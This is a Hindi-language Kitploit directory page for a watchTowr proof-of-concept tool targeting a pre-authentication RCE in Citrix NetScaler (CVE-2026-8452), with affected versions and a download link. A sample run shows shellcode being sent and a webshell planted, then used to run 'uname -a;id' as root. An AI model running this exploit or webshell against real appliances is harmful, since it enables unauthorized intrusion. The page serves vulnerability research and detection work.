Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
watchTowr-vs-Citrix-Netscaler-PreAuth-RCE-CVE-2026-8452 — CVE-2026-8452 PreAuth RCE | Kitploit
उपकरण/GitHubGitHub/watchtowrlabs/watchtowr-vs-citrix-netscaler-preauth-rce-cve-2026-8452
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणरेड टीमिंगशेलकोड जनरेशनपेलोड डेवलपमेंट
GitHubwatchtowrlabs/watchtowr-vs-citrix-netscaler-preauth-rce-cve-2026-8452

watchTowr-vs-Citrix-Netscaler-PreAuth-RCE-CVE-2026-8452

CVE-2026-8452 PreAuth RCE

रिपॉजिटरी देखें
61151126 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

watchTowr-vs-Citrix-Netscaler-PreAuth-RCE

Citrix NetScaler CVE-2026-8452 के लिए डिटेक्शन आर्टिफैक्ट जनरेटर

तकनीकी विवरण के लिए हमारी ब्लॉग पोस्ट देखें।

कार्य में डिटेक्शन

root@kitploit:~
python3 watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py --target https://172.16.5.12:9443/
                     __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                          \/          \/     \/

        watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py

        (*) Citrix NetScaler PreAuth Heap overflow to RCE Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2026-8452]

[*] Connecting to endpoint...
[*] target AAA service is responsive
[*] building shellcode
[+] shellcode size: 268 bytes
[*] triggering jmp rax to 0x112d30180
[*] sent..
[+] webshell will be at https://172.16.5.12:9443/vpn/theme/x.php?0=uname+-a;id
[+] web shell output:


FreeBSD something 11.4-NETSCALER-13.1 FreeBSD 11.4-NETSCALER-13.1 #0 ef731ca813f0(heads/artesa_30_52)-dirty: Wed Aug 24 08:24:55 PDT 2022     root@sjc-bld-bsd114-215:/usr/obj/usr/home/build/adc/usr.src/sys/NS64  amd64
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)

सभी ऑफ़सेट/पते NetScaler के संस्करण 13.1-30.52 के लिए हार्डकोडेड हैं

प्रभावित संस्करण

यह भेद्यता तब पहुँच योग्य है जब NetScaler उपकरण SAML का उपयोग या तो सेवा प्रदाता (SP) या पहचान प्रदाता (IdP) के रूप में करने के लिए कॉन्फ़िगर किया गया हो।

Citrix निम्नलिखित संस्करणों को प्रभावित बताता है:

  • NetScaler ADC और NetScaler Gateway 14.1, 14.1-72.61 से पहले
  • NetScaler ADC और NetScaler Gateway 13.1, 13.1-63.18 से पहले

watchTowr लैब्स का अनुसरण करें

नवीनतम सुरक्षा अनुसंधान के लिए watchTowr लैब्स टीम का अनुसरण करें

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
टूल डाउनलोड करें